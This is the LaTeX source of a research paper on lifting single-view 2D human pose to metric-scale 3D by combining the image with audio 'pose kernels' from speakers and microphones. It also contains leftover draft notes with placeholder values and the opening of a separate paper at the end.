where $k_j(t)$ is the \textit{pose kernel} heard from the $j^{\rm th}$ microphone---a time-invariant audio impulse response with respect to human pose geometry that transforms the transmitted audio signals, as shown in Figure~\ref{fig:pose_kernel}. $M$ denotes the number of received audio signals\footnote{The number of audio sources (speakers) does not need to match with the number of received audio signals (microphones).}.
The pose kernel transforms the transmitted waveform as follows:
\begin{align}
r_j(t) = s(t) * (\overline{k}_j(t) + k_j(t)),
\end{align}
where $*$ is the operation of time convolution, $s(t)$ is the transmitted source signal and $r_j(t)$ is the received signal at the location of the $j^{\rm th}$ microphone. $\overline{k}_j(t)$ is the empty room impulse response that accounts for transformation of the source signal due to the static scene geometry, e.g., wall and objects, in the absence of a person. $k_j(t)$ is the pose kernel measured at the $j^{\rm th}$ microphone location that accounts for signal transformation due to human pose.
The pose kernel can be obtained using the inverse Fourier transform, i.e.,
\begin{align}
k_j(t) = \mathcal{F}^{-1} \{K_j(f)\},~~~K_j(f) = \frac{R_j(f)}{S(f)} - \overline{K}_j(f),
\end{align}
where $\mathcal{F}^{-1}$ is the inverse Fourier transformation, and $R_j(f)$, $S(f)$, and $\overline{K}_j(f)$ are the frequency responses of $r(t)$, $s(t)$, and $\overline{k}_j(t)$, respectively, e.g., $R(f) = \mathcal{F}\{r(t)\}$.
Since the pose kernel is dominated by direct reflection from the body, it is agnostic to scene geometr
\footnote{
The residual after subtracting the room response still includes multi-path effects involving the body. However, we observe that such effects are negligible in practice, and the pose kernel is dominated by the direct reflection from the body. Therefore, it is agnostic to scene geometry. See Section~\ref{sec:discussion} for a discussion on multi-path shadow effect.}. The scene geometry is factored out by the empty room impulse response $\overline{k}_j(t)$ and the source audios $s(t)$ are canceled by the received audios $r(t)$, which allows us to generalize the learned $g_{\boldsymbol{\theta}}$ to various scenes.
\subsection{Spatial Encoding of Pose Kernel}
We encode the time-domain pose kernel of the $j^{th}$ microphone, $k_j(t)$ to 3D spatial-domain where audio and visual signals can be fused.
A transmitted audio at the speaker's location $\mathbf{s}_{\rm spk}\in \mathds{R}^3$ is reflected by the body surface at $\mathbf{X}\in \mathds{R}^3$ and arrives at the microphone's location $\mathbf{s}_{\rm mic}\in \mathds{R}^3$. The arrival time is:
\begin{align}
t_{\mathbf{X}} = \frac{\|\mathbf{s}_{\rm spk} - \mathbf{X}\|+\|\mathbf{s}_{\rm mic} - \mathbf{X}\|}{v}, \label{Eq:delay}
\end{align}
where $t$ is the arrival time, and $v$ is the constant speed of sound (Figure~\ref{Fig:spatial_encoding}).
The pose kernel is a superposition of impulse responses from the reflective points in the body surface, i.e.,
\begin{align}
k_j(t) = \sum_{\mathbf{X}\in \mathcal{X}} A(\mathbf{X}) \delta(t-t_{\mathbf{X}}), \label{Eq:reflector}
\end{align}
where $\delta(t-t_{\mathbf{X}})$ is the Dirac delta function (impulse response) at $t= t_{\mathbf{X}}$. $t_{\mathbf{X}}$ is the arrival time of the audio signal reflected by the point $\mathbf{X}$ on the body surface $\mathcal{X}$. $A(\mathbf{X})$ is the reflection coefficient (gain) at $\mathbf{X}$.
Equation~(\ref{Eq:delay}) and (\ref{Eq:reflector}) imply two important spatial properties of the pose kernel. (i)
Since the locus of points whose sum of distances to the microphone and the speaker is an ellipsoid, Equation~(\ref{Eq:delay}) implies that the same impulse response can be generated by any point on this ellipsoid.
(ii) Due to the constant speed of sound, the response of the arrival time can be interpreted as that of the spatial distance by evaluating the pose kernel at the corresponding arrival time, $t_{\mathbf{X}}$:
\begin{align}
\mathcal{K}_j(\mathbf{X}) = k_j(t)|_{t = t_{\mathbf{X}}},
\label{Eq:encoding}
\end{align}
where $\mathcal{K}_j(\mathbf{X})$ is the spatial encoding of the pose kernel at $\mathbf{X}\in \mathds{R}^3$.
\setlength{\columnsep}{10pt}
\begin{wrapfigure}{r}{0.4\linewidth}
\vspace{-9mm}
\begin{center}
\includegraphics[width=1\linewidth]{geom.pdf}
\end{center}
\vspace{-5mm}
\caption{Pose kernel spatial encoding.}
\label{Fig:spatial_encoding}
\vspace{-5mm}
\end{wrapfigure}
Let us illustrate the spatial encoding of pose kernel. Consider a point object $\mathbf{X} \in \mathds{R}^2$ that reflects an audio signal from the speaker $\mathbf{s}_{\rm spk}$ which is received by the microphone $\mathbf{s}_{\rm mic}$ as shown in Figure~\ref{Fig:spatial_encoding}. The received audio is delayed by $t_{\mathbf{X}}$, which can represented as a pose kernel $k(t) = A(\mathbf{X})\delta (t-t_{\mathbf{X}})$. This pose kernel can be spatially encoded as $\mathcal{K}(\mathbf{X})$ because the speed of the sound is constant. Note that there exists the infinite number of possible locations of $\mathbf{X}$ given the pose kernel because any point
(e.g., $\widehat{\mathbf{X}}$) on the ellipse (dotted ellipse) has constant sum of distances from the speaker and microphone.
\begin{figure}[t]
\begin{center}
\subfigure[Empty room response]{\label{fig:empty}\includegraphics[width=0.85\linewidth]{toy1.pdf}}\\\vspace{-3mm}
\subfigure[Object response]{\label{fig:object}\includegraphics[width=0.85\linewidth]{toy2.pdf}}\\\vspace{-3mm}
\subfigure[Rotated object response]{\label{fig:rotate}\includegraphics[width=0.85\linewidth]{toy3.pdf}}\\\vspace{-3mm}
\subfigure[Translated object response]{\label{fig:translate}\includegraphics[width=0.85\linewidth]{toy4.pdf}}
\end{center}
\vspace{-7mm}
\caption{Visualization of the spatial encoding (left column) of time-domain impulse response (right column) through a sound simulation. The elliptical patterns can be observed by the spatial encoding where their focal points coincide with the locations of the speaker and microphone. (a) We visualize the empty room impulse response. (b) When an object is present, a strong impulse response that is reflected by the object surface can be observed. We show full responses that include the pose kernel. (b) Due to the object rotation, the kernel response is changed. (c) We observe delayed pose kernel due to translation. }
\label{fig:encoding_pose_kernel}
\vspace{-5mm}
\end{figure}
Figure \ref{fig:encoding_pose_kernel} illustrates (a) the empty room impulse response and (b,c,d) the full responses with the pose kernels by varying the location and pose of an object.
The left column shows the pose kernel $k_j(t)$ encoded to the physical space, while the right column shows the actual signal.
Due to the fact that no bearing information is included from audio signal, each peak in the pose kernel $k_j(t)$ corresponds to a possible reflector location on the ellipse of which focal points coincide with the locations of the speaker and microphone.
With the spatial encoding of the pose kernel, we reformulate Equation~(\ref{Eq:time}):
\begin{align}
\{\mathbf{P}_i(\mathbf{X})\}_{i=1}^N = g_{\boldsymbol{\theta}} (\phi_v(\mathbf{X};\mathbf{I}),~~ \underset{j}{\operatorname{max}}~ \phi_a(\mathcal{K}_j(\mathbf{X}))), \label{Eq:space}
\end{align}
where $\phi_v$ and $\phi_a$ are the feature extractors for visual and audio signals, respectively.
\begin{figure*}[t]
\centering
\includegraphics[width=\linewidth]{network}
\caption{We design a 3D convolutional neural network to encode pose kernels (audio) and 2D pose detection (image) to obtain the 3D metric reconstruction of a pose. We combine audio and visual features using a series of convolutions (audio features from multiple microphones are fused via max-pooling.). The audio visual features are convolved with a series of $3\times 3\times 3$ convolutional kernels to predict the set of 3D heatmaps for joints. We use multi-stage prediction, inspired by the convolutional pose machine architecture~\cite{wei2016cpm}, which can effectively increase the receptive field while avoiding vanishing gradients. }
\label{fig:architecture}
\vspace{-0.05in}
\end{figure*}
Specifically, $\phi_v$ is the visual features evaluated at the projected location of $\mathbf{X}$ onto the image $\mathbf{I}$, i.e.,
\begin{align}
\phi_v(\mathbf{X};\mathbf{I}) = \{\mathbf{p}_i(\Pi \mathbf{X})\}_{i=1}^N,
\end{align}
where $\mathbf{p}_i \in [0,1]^{W\times H}$ is the likelihood of the $i^{\rm th}$ landmark in the image $\mathbf{I}$. $\Pi$ is the operation of 2D projection, i.e., $\mathbf{p}_i(\Pi \mathbf{X})$ is the likelihood of the $i^{\rm th}$ landmark at 2D projected location $\Pi \mathbf{X}$.
$\phi_a(\mathcal{K}_j(\mathbf{X}))$ is the audio feature from the $j^{\rm th}$ pose kernel evaluated at $\mathbf{X}$. We use the max-pooling operation to fuse multiple received audio signals, which is agnostic to location and ordering of audio signals.
This facilitates scene generalization where the learned audio features can be applied to a new scene with different audio configurations (e.g., the number of sources, locations, scene geometry).
We learn $g_{\boldsymbol{\theta}}$ and $\phi_a$ by minimizing the following loss:
\begin{align}
\mathcal{L} = \sum_{\mathbf{I},\mathcal{K}, \widehat{\mathbf{P}}\in \mathcal{D}} \|g_{\boldsymbol{\theta}} (\phi_v,~ \underset{j}{\operatorname{max}}~ \phi_a(\mathcal{K}_j)) - \{\widehat{\mathbf{P}}_i\}_{i=1}^N\|^2,
\end{align}
where $\{\widehat{\mathbf{P}}_i\}_{i=1}^N$ is the ground truth 3D heatmaps, and $\mathcal{D}$ is the training dataset. Note that this paper focuses on the feasibility of metric lifting by using audio signals where we use an off-the-shelf human pose estimator $\{\mathbf{p}_i\}_{i=1}^N$~\cite{8765346}.
\subsection{Network Design and Implementation Details}
We design a 3D convolution neural network (3D CNN) to encode 2D pose detection from an image (using OpenPose~\cite{8765346}) and four audio signals from microphones. Inspired by the design of the convolution pose machine~\cite{wei2016cpm}, the network is composed of six stages that can increase the receptive field while avoiding the issue of the vanishing gradients. The 2D pose detection is represented by a set of heatmaps that are encoded in the $70\times 70\times 50$ voxel grid via inverse projection, which forms 16 channel 3D heatmaps. For the pose kernel from each microphone, we spatially encode over a $70\times 70\times 50$ voxel grid that are convolved with three 3D convolutional filters followed by max pooling across four audio channels. Each grid is 5 cm, resulting in 3.5 m$\times$3.5 m$\times$2.5 m space. These audio features are combined with the visual features to form the audio-visual features. These features are transformed by a set of 3D convolutions to predict the 3D heatmaps for each joint. The prediction, in turn, is combined with the audio-visual features to form the next stage prediction.
The network architecture is shown in Figure \ref{fig:architecture}.
We implemented the network with PyTorch, and trained it on a server using 4 Telsa v100 GPUs. SGD optimizer is used, and learning rate is 1. The model has been trained for 70 epochs (around 36 hours) until convergence.
\section{Old texts}
\section{Dataset}
* We collected synchronized audio and vision data in 6 different environments across 6 different people.
* Data is recording using a Zoom F8n field recorder with commercial speakers and mics.
* Each person is asked to perform daily tasks in the environments while our audio and vision sensors are recording.
* In all environments, audio sensor and camera are registered to the same environment using colmap.
* The result is a dataset consisting of 5000 frames
\section{Implementation}
* We train using a batch size of xxx, and learning rate of xxx.
* Data is being trained on a server with 8xv100 GPUs for xx hours.
\section{Evaluation}
* We perform different kinds of test showing that our algorithm is working across different environments
* We compare with a base line where no audio sensor is used, and conducted a ablation study showing the performance gain with increased number of audio sensors
In this section, we will elaborate on how audio impulse response is related to geometry, and how we eventually encode audio responses into the 3D space for pose landmark likelihood estimation. We will start from a simple example illustrating how audio changes with respect to geometry, and then dive deep into the mathematics behind.
\textbf{Will sound change according to geometry (or pose)?}
Consider a simple example where a cubic object is placed in a room.
We use a speaker to shine a signal towards the object, and use a microphone to capture the signal bouncing off the object and room, as shown in figure \ref{fig:encoding_pose_kernel}.
We rotate the object around its center and plot the \textit{cross correlation} value between the received signal when (1) object is at pose $\theta$ ($R(\theta)$) and (2) object is at initial pose $\theta_0$ ($R(\theta_0)$)
We can see that cross correlation changes with different pose $\theta$.
\begin{figure}[hbt].
\centering
\vspace{-0.05in}
\includegraphics[width=\linewidth]{dummy.pdf}
\vspace{-0.25in}
\caption{(a) Simulation scenario, (b) Signal cross correlation value changes with respect to pose $\theta$}
\label{fig:encoding_pose_kernel}
\vspace{-0.05in}
\end{figure}
This is because, different pose of the object creates different reflection profile (or echos) of the sound, and eventually leading to the variation of sound signal received by the microphone.
\textbf{Inferring geometry from sound:}
Now let us bring more maths to the problem.
We first consider an open space without room echos.
Assume the speaker is placed at location $P_s$, and microphone is placed at location $P_m$.
Denote the transmitted sound from speaker as $s(t)$ and received sound captured from microphone as $r(t)$.
As we talked about in section 3.1, we can estimate an impulse response $k(t)$ caused by sound reflections through deconvolving $r(t)$ with $s(t)$.
As shown in figure \ref{fig:impulse}(a), there are a bunch of peaks in the impulse response $k(t)$. We use a Dirac delta function $\delta(t-t_i)$ to represent each peak at time $t = t_i$
Thus the impulse response can be represented as:
\begin{equation}
k(t) = \sum_{i = 1} ^N A_i \cdot\delta(t - t_i)
\end{equation}
where $A_i$ is the amplitude of the peak, and $N$ is the total number of peaks.
\begin{figure}[hbt].
\centering
\vspace{-0.05in}
\includegraphics[width=\linewidth]{dummy.pdf}
\vspace{-0.25in}
\caption{(a) Impulse response illustration. (b) A peak in impulse response corresponds to a potential reflector on the eclipse.}
\label{fig:impulse}
\vspace{-0.05in}
\end{figure}
For a given peak $A_i \delta(t-t_i)$ at time instance $t = t_i$, it actually corresponds to a reflection path of the audio signal. This is true because after convolution with original source signal $s(t)$, the result is a delayed and attenuated copy of original source signal $s(t)$, or in other words, creating echo $s^i(t)$ where
\begin{equation}
s^i(t) = A_i \delta(t - t_i) * s(t) = A_i s(t - t_i)
\end{equation}
This means, each peak $A_i \delta(t-t_i)$ in the impulse response $k$, corresponds to a signal path with time of flight equals to $t_i$.
Then, basic physics tells us the distance between the microphone speaker pair and the reflector would be
\begin{equation}
\label{equation:distance}
d_{im} + d_{is} = t_i \cdot v
\end{equation}
where $v$ is the speed of sound, and $d_{im,s}$ are the distances between the $i^th$ reflector and the microphone, speaker.
This implies, the reflector is on an ecilipse trajectory with the speaker and mic at the 2 focuses, as shown in figure \ref{fig:impulse}(b).
Then let us consider the case where the reflector is inside a room.
By measuring in the scenario with and without person, we can get $2$ impulse responses $k(t)$ and $k_0(t)$, and a subtraction will give the human related impulse response $k_j(t)$ (measured at the $j^{th}$ speaker and microphone pair) as:
\begin{equation}
k_j(t) = k(t) - k_0(t)
\end{equation}
Finally by applying the physics from equation \ref{equation:distance}, we connect this human related impulse response $k_j$ with human pose geometry.
\textbf{Spatial encoding of audio impulse response:}
We encode audio impulse response to 3D and creates an audio heatmap $W_j\in [0,1]^{D\times D\times D}$ in the physical frame (discretized into $D\times D\times D$), according to the audio-geometry math above.
One important thing to note, however, is that, unlike vision, the speaker and microphone that we use do not offer bearing information. Any point in the 3D space with the same distance to the speaker/mic pair will provide exactly the same time-of-flight, and thus contributes exactly the same to the audio impulse response.
To fully recover this omni-directional characteristic, we use a the following method for data encoding:
Assume the microphone is located at $P_{jm}(x_m,y_m,z_m)$, and speaker is located at $P_{jm}(x_s,y_s,z_s)$ in the global frame.
Then for any given point $P(x,y,z)$, the 3D heatmap value $W_j(x, y, z)$ would be:
\begin{equation}
W_j(x, y, z) = k_j((d_{jm} + d_{js}) / v)
\end{equation}
where $k_j$ is the human related impulse response and $d_{jm,s}$ are the distances between point $P$ and the microphone, speaker location $P_{jm,s}$, i.e.,
\begin{align}
d_{jm} &= ||(x_0,y_0,z_0)-(x_m,y_m,z_m)||_2 \\
d_{js} &= ||(x_0,y_0,z_0)-(x_s,y_s,z_s)||_2
\end{align}
\textbf{Spatial encoding of vision data:}
Vision data is encoded similarly based on propagation model.
The major difference, is, however, vision ray is directional, but does not offer timing information.
We hope a fusion of audio and vision will provide us both bearing, and depth, and thus a 3D human pose.
Recall that for any given image, each pixel on the 2D image corresponds to one ray in the 3D space, obtained from camera intrinsic matrix.
We use OpenPose \cite{openpose} to get 2D joint location for 15 joints on the human body.
These 15 2D joint location are then projected into the 3D space to form 15 signal ray.
Any given point on each of these rays is a possible 3D joint location.
For the purpose of data smoothing, we use a Gaussian representation of the ray to create a 3D heatmap.
Finally, after encoding audio and vision data to the 3D space, we directly regress joint heatmap from this 3D space.
\subsection{Objective function and Implementation}
We used 3D CNN as building blocks to directly regress pose from the $D\times D\times D$ heatmaps for audio and vision.
A multi stage 3D CNN pipeline is proposed, and short cuts are introduced to prevent potential gradient vanishing.
We also adopted a max pooling layer for audio signals after audio feature extracting, so that neural network will not memorize the audio sensor sequence for the sake of best generalizability.
We estimate the joint heatmaps for each of the joints, and a mean square loss is reported at the end of each stage.
The final loss is the sum of all losses for each stage:
\begin{equation}
L = \sum_{i = 1}^N L_i
\end{equation}
\subsection{Overview}
Single view human pose lifting is the problem of estimating 3D human pose from a 2D image, defined by the following equation, where $X$ is the 3D human pose, and $I$ is the 2D image:
\begin{equation}
\label{equ:problem_orig}
X = f(I)
\end{equation}
Due to the lack of depth information, an infinitive number of poses will match with the 2D image. In other words, this is an ill defined problem.
Sound, given its relatively slow speed of propagation, offers a unique opportunity of distance estimation.
Imagine we have a couple of speakers and microphones in the environment.
By emitting sound from speakers and collecting signals reflected off human body at the microphone side, we can estimate the time-of-flight of sound, which can translate to depth measurement (for each body joint).
While theoretically plausible, there are, of course a lot of challenges given the dispersive nature of sound, causing heavy multipaths, especially in indoor environments.
This paper focus on tackling all the challenges and including a new modality, audio $A$, into the pipeline of 3D pose estimation, mathematically denoted as:
\begin{equation}
\label{equ:problem_our}
X = f(I, A)
\end{equation}
More specifically, to extract as much spatial information as we can from audio, we deployed multiple audio sensors (speakers and microphones) around the environment, giving us $k$ different audio measurements $A_1, A_2, ..., A_k$ for each pose:
\begin{equation}
\label{equ:problem_our}
X = f(I, A_1, A_2, ..., A_k)
\end{equation}
A signal processing pipeline $h(\cdot)$ is proposed to effectively cope with the indoor audio multipath, and encode 1D audio data to 3D heatmap space.
Similarly, vision information is also encoded to 3D space through a function $g(\cdot)$:
\begin{equation}
\label{equ:problem_our_specific}
X = f(g(I), h(A_1), h(A_2), ..., h(A_k))
\end{equation}
Finally a 3D CNN is trained on the audio and vision 3D heatmaps to regress human joint locations.
In the rest of this section, we will first give an experimental study showing the feasibility of the idea from signal's perspective.
Then we will elaborate on each component of the pipeline, especially how we design $f$, $g$, and $h$.
Let us first start with feasibility study.
\subsection{Feasibility study: can audio infer geometry?}
\textbf{Acoustic simulation result:}
\textbf{Real world toy example:}
Now let us move to the real world experiment of human pose estimation.
We ask the person to stand still in the same location, while doing different poses.
Similarly, we also record the \textit{cross correlation} value $xcorr$ between two human poses $P_1$ and $P_2$.
We ask the person to do a fixed list of poses, for multiple times.
Table \ref{table:toy} shows the result.
It is evident that if for the same pose, the xcorr value is high, while for different poses, xcorr value is low.
This implies the promise of using audio as a method for pose estimation.
\subsection{How to infer geometry: signal processing background}
However, most of the times, the echos are merged with the original sound signal, making it difficult to interpret.
To extract the reflection profile (or more technically the time domain impulse response $h$), we perform a deconvolution between the receiver signal $R$ and the source signal $S$ \cite{}.
\begin{equation}
h = R *^{-1} S
\end{equation}
In an ideal case where there is no multipath reflection, each object in the environment will correspond to one Dirac delta function in the impulse response.
Assume the speaker and microphone are co-located and synchronized, the location of the peaks exactly represent the time-of-flight.
\textbf{Estimating distance in rich multipath indoor environment}:
Then let us move to a more realistic scenario.
In a typical indoor room environment, where there are a lot of echos, instead of getting a bunch of clear Delta functions in the impulse response, what we get is a complex time domain function with a lot of peaks merged together.
Figure \ref{fig:rir}(a) shows a typical room impulse response.
Each of these peak corresponds to a reflecting surface in the environment, e.g., walls, ceilings, furniture, etc.
Given the massive number of reflecting surfaces and their complex reflecting property, understanding geometry from this complex signal would be prohibitive if not impossible.
However, recall that our goal is to reconstruct human pose, so we are not exactly interested in those room reflections.
What we really need to extract are those human related reflections.
Now, imagine we have 2 time domain impulses, one with person and one without person, as shown in figure \ref{fig:rir}(a) and (b).
If we align them properly and perform a subtraction, the static environmental reflections will be cancelled out, and the result is human related reflections, as shown in figure \ref{fig:rir}(c).
Different peaks in figure \ref{fig:rir}(c) ideally corresponds to reflections from different body parts, and this serves as the physics foundation of the paper.
With the increasing popularity of always-on mics in today's smart voice assistants, it is easy to perform a scan of the room, and get an accurate empty room impulse response.
Building on this, we designed our system.
\begin{figure}[hbt].
\centering
\vspace{-0.05in}
\includegraphics[width=\linewidth]{dummy.pdf}
\vspace{-0.25in}
\caption{}
\label{fig:rir}
\vspace{-0.05in}
\end{figure}
\subsection{Data encoding}
To make our model as general possible,
we adopt a physics based approach to model how signal propagates.
This is because, both audio and vision follows the physics way of propagation.
We try to directly regress the 3D pose from the 3D space based on signal propagation physics.
Let us start with audio data encoding.
\\
\textbf{Audio data encoding:}
Recall that we already have the one dimensional impulse response (after subtracting empty room response), the next task would be connecting this with 3D geometry.
Note that the speaker and microphone that we use do not offer bearing information, any point in the 3D space with the same distance to the speaker/mic pair will provide exactly the same response.
This implies the polar coordinate system based 3D encoding method.
Assume the sensor’s location is denoted as $(x_0,y_0,z_0)$ in the global frame.
Then for any given location $P(x,y,z)$, the response equals to $RIR(|(x_0,y_0,z_0)-(x,y,z)|)$\\
\textbf{Vision data encoding:}
Vision data is encoded similarly based on propagation model.
The major difference, is, however, vision ray is directional, but does not offer timing information.
We hope a fusion of audio and vision will provide us both bearing, and depth, and thus a 3D human pose.
Recall that for any given imagre, each pixel on the 2D image corresponds to one ray in the 3D space.
We use OpenPose \cite{} to get 2D joint location for 15 joints on the human body.
These 15 2D joint location are then projected into the 3D space to form 15 signal ray.
Any given point on each of these rays is a possible 3D joint location.
For the purpose of data smoothing, we use a Gaussian representation of the ray to create a 3D heatmap.\\
\textbf{Groundtruth encoding}
Similar with Convolutional Pose Machine \cite{}, for joint labels, we also use a 3D gaussian distribution located at the groundtruth joint location in the 3D space.
* Finally a 3D CNN is trained to regress the vision rays and audio RIR heatmap to every joint location
\subsection{Network architecture}
* We use 3D convolution layer as the basic building block of our network.
* Input has 4 audio heatmap channels and 15 vision Ray heatmap channels.
* Output is 15 channels of joint heatmaps
* Considering the high dimensionality of our data, we have multiple blocks of network.
* Each block output is compared with groundtruth to obtain a L2 loss.
* We added shortcuts to avoid the potential gradient vanishing problem
* We train the network for minimizing the sum of all L2 losses.
\section{Related work}
This paper is primarily concerned with integrating information from audio signals with single view 3D pose estimation to obtain metric scale. We briefly review the related work in these domains.
\noindent\textbf{Vision based Lifting} While reconstructing 3D pose (a set of body landmarks) from a 2D image is geometrically ill-posed, the spatial relationship between landmarks provides a geometric cue to reconstruct the 3D pose~\cite{cjtaylor}. This relationship can be learned from datasets that include 2D and 3D correspondences such as Human3.6M~\cite{ionescu2013human36m}, MPI-INF-3DHP~\cite{mono-3dhp2017} (multiview), Surreal~\cite{varol17_surreal} (synthetic), and 3DPW~\cite{vonMarcard2018} (external sensors). Given the 3D supervision, the spatial relationship can be directly learned via supervised learning~\cite{tome, sun2018,habibie,chang}. Various representations have been proposed to effectively encode the spatial relationship such as volumetric representation~\cite{pavlakos}, graph structure~\cite{cai19,zhao19,ci19,xu21}, transformer architecture~\cite{yushuke,llopart,li21}, compact designs for realtime reconstruction~\cite{vneck,xneck}, and inverse kinematics~\cite{li_cvpr21}. These supervised learning approaches that rely on the 3D ground truth supervision, however, show limited generalization to images of out-of-distribution scenes and poses due to the domain gap. Weakly supervised, self-supervised, and unsupervised learning have been used to address this challenge. For instance, human poses in videos are expected to move and deform continuously over time, leading to a temporal self-supervision~\cite{hossain}. A dilated convolution that increases temporal receptive fields is used to learn the temporal smoothness~\cite{pavllo,Tripathi20}, a global optimization is used to reconstruct temporally coherent pose and camera poses~\cite{arnab19}, and spatio-temporal graph convolution is used to capture pose and time dependency~\cite{cai19, yu20,liu20}. Multiview images provide a geometric constraint that allows learning view-invariant visual features to reconstruct 3D pose. The predicted 3D pose can be projected onto other view images~\cite{rhodin18, rhodin_eccv18,wendt}, stereo images are used to triangulate a 3D pose which can be used for 3D pseudo ground truth for other views~\cite{kocabas,iskakov, iqbal}, and epipolar geometry is used to learn 2D view invariant features for reconstruction~\cite{he20,yao19}. Adversarial learning enables decoupling the 3D poses and 2D images, i.e., 3D reconstruction from a 2D image must follow the distribution of 3D poses, which allows learning from diverse images (not necessarily videos or multiview)~\cite{chen,kudo,wandt19}. A characterization and differentiable augmentation of datasets, further, improves the generalization~\cite{gong, wang20}. With a few exceptions, despite remarkable performance, the reconstructed poses lack the metric scale because of the fundamental ambiguity of 3D pose estimation. Our approach leverages sound generated by consumer-grade speakers to lift the pose in 3D with physical scale.
\noindent\textbf{Multimodal Reconstruction}
Different modalities have been exploited for the purpose of 3D sensing and reconstruction, include RF based \cite{rfpose,rfavatar,wipose,jin2018towards,guan2020through}, inertial based \cite{shen2016smartwatch,yang2020ear}, and acoustic based \cite{yun2015turning,fan2021aurasense, fan2020acoustic,christensen2020batvision,wilson2021echo,senocak2018learning,chen2020soundspaces}.
Various applications including self-driving car \cite{guan2020through}, robot manipulation and grasping \cite{wang2016robot, wang2019multimodal, watkins2019multi, nadon2018multi}, simultaneous localization and mapping (SLAM) \cite{terblanche2021multimodal, doherty2019multimodal, akilan2020multimodality, singhal2016multi, sengupta2019dnn} benefited from multimodal reconstruction.
Audio, given its ambient nature, has attracted unique attention in multimodal machine learning \cite{liu2018towards,rodriguez2018methodology, ngiam2011multimodal,ghaleb2019metric, burnsmulti, mroueh2015deep}.
However, few works \cite{yun2015turning,christensen2020batvision,wilson2021echo} appear in the area of multimodal geometry understanding using audio as a modality, due to the heavy audio multipath posing various difficulties in 3D understanding.
Human pose, given its diverse nature, is especially challenging for traditional acoustic sensing, thus is sparsely studied.
While similar signals like WiFi and FMCW radio have been used for human pose estimation \cite{rfpose,rfavatar,wipose}, audio signal, given its lower speed of propagation, offers more accurate distance measurement than RF-based.
We address the challenge of audio multipath and uncover the potential of audio in accurate metric scale 3D human pose estimation. Specifically, we present the first method that combines audio signals with the 2D pose detection to reason about the 3D spatial relationship for metric reconstruction. Our approach is likely to be beneficial for various applications including smart home, AR/VR, robotics.
\section{Results}
We evaluate our method on the PoseKernel dataset by comparing with state-of-the-art and baseline algorithms.
\noindent\textbf{Evaluation Metric} We use the mean per joint position error (MPJPE) and the percentage of correct keypoint (PCK) in 3D as the main evaluation metrics. For PCK, we report the PCK\@$t$ where $t$ is the error tolerance in cm.
\noindent\textbf{Baseline Algorithms} Two state-of-the-art baseline algorithms are used. (1) Lifting from the Deep, or \texttt{Vis.:LfD}~\cite{tome} is a vision based algorithm that regresses the 3D pose from a single view image by learning 2D and 3D joint locations
together. To resolve the depth ambiguity, a statistical model is learned to generate a plausible 3D reconstruction. This algorithm predicts 3D pose directly where we apply the Procrustes analysis to align with image projection. (2) FrankMocap (\texttt{Vis.:FrankMocap}~\cite{rong2021frankmocap}) leverages the pseudo ground truth 3D poses on in-the-wild images that can be obtained by EFT~\cite{joo2020eft}. Augmenting 3D supervision improves the performance of 3D pose reconstruction. This algorithm predicts the shape and pose using the SMPL parameteric mesh model~\cite{SMPL:2015}. None of existing single view reconstruction approaches including these baseline methods produces metric scale reconstruction.
Given their 3D reconstruction, we scale it to a metric scale by using the average human height in our dataset (1.7m).
\noindent\textbf{Our Ablated Algorithms} In addition to the state-of-the-art vision based algorithms, we compare our method by ablating our sensing modalities.
(1) \texttt{Audio$\times$4} uses four audio signals to reconstruct the 3D joint locations to study the impact of the 2D visual information. (2) \texttt{Vis.+Audio$\times$2} uses a single view image and two audio sources to predict the 3D joint location in the 3D voxel space. (3) \texttt{Ours} is equivalent to Vision+Audio$\times$4.
\subsection{PoseKernelLifter Evaluation}
\begin{figure*}[t]
\centering
\includegraphics[width=\linewidth]{qual1.pdf}
\caption{Qualitative results. We test our pose kernel lifting approach in diverse environments including (a) basement, (b) living room, (c) laboratory, etc. The participants are asked to perform daily activities such as sitting, squatting, and range of motion. (d): A failure case of our method: severe occlusion.}
\label{fig:result_vis}
\vspace{-0.05in}
\end{figure*}
\vspace{-0.05in}
Among the six environments in PoseKernel dataset, we use 4 environments for training and 2 environments for testing. The training data consists of diverse poses performed by six
adult (whose heights range between 155 cm and 180 cm) and two minors (with heights 140 cm and 150 cm). The testing data includes two adult and one minor participants whose heights range between 140 cm and 180 cm.
\noindent\textbf{Comparison} We measure the reconstruction accuracy using MPJPE metric summarized in Table~\ref{mpjpe}. As expected, state-of-the-art vision based lifting approaches (\texttt{Vis.:LfD} and \texttt{Vis.:Frank}) that predict 3D human pose in a scale-free space are sensitive to the heights of the subjects, resulting in 18 $\sim$ 40 cm mean error for adults and 40 $\sim$ 60 cm for minors, i.e., the error is larger for minor participants because their heights are very different from the average height 1.7 m. \texttt{Vis.:Frank} outperforms \texttt{Vis.:LfD}, because \texttt{Vis.:Frank} uses a larger training data, and thus estimates poses more accurately. Nonetheless, our pose kernel that is designed for metric scale reconstruction significantly outperforms these approaches. The performance is not dependent on the heights of the participants. In fact, it produces around 20\% smaller error for minor participants that the adult participants because of their smaller scale. Similar observations can be made in PCK summarized in Table~\ref{pck}.
\noindent\textbf{Ablation Study} We ablate the sensing components of our pose kernel approach. As summarized in Tables~\ref{mpjpe} and \ref{pck}, the 3D metric lifting leverage the strong cue from visual data. Without visual cue, i.e., $\texttt{Audio$\times$4}$, the reconstruction is highly erroneous, while combining with audios as a complementary signal (\texttt{Vis.+Audio$\times$2} and \texttt{Ours}) significantly improve the accuracy.
While providing metric information, reconstructing the 3D human pose from audio signals alone (\texttt{Audio$\times$4}) is very challenging because the signals are (1) non-directional: a received signal is integration of audio signals over all angles around the microphone which does not provide bearing angle unlike visual data; (2) non-identifiable: the reflected audio signals are not associated with any semantic information, e.g., hand, arm, and head, so it is difficult to tell where a specific reflection is coming from; and (3) slow: due to the requirement of linear frequency sweeping (10 Hz), the received signals are blurred in the presence of body motion, which is equivalent to an extremely blurry image created by 100 ms exposure with a rolling shutter. Nonetheless, augmenting audio signals improve 3D metric reconstruction regardless the heights of the participants.
\noindent\textbf{Generalization} We report the results in completely different testing environments, which show the strong generalization ability of our method. For each environment, the spatial arrangement of the camera and audio/speakers is different, depending on the space configuration. Figure \ref{fig:result_vis} visualizes the qualitative results of our 3D pose lifting method where we successfully recover the metric scale 3D pose in different environments. We also include a failure cases in the presence of severe occlusion as shown in Figure \ref{fig:result_vis}(d).
| 2024-02-18T23:40:11.217Z | 2021-12-06T02:06:40.000Z | algebraic_stack_train_0000 | 1,571 | 12,284 |
|
proofpile-arXiv_065-7729 | \section{Introduction}
\begin{figure}
\begin{center}
\includegraphics[width=\columnwidth]{figures/diffs.jpg}
\end{center}
\vspace{-0.6cm}
\begin{small}
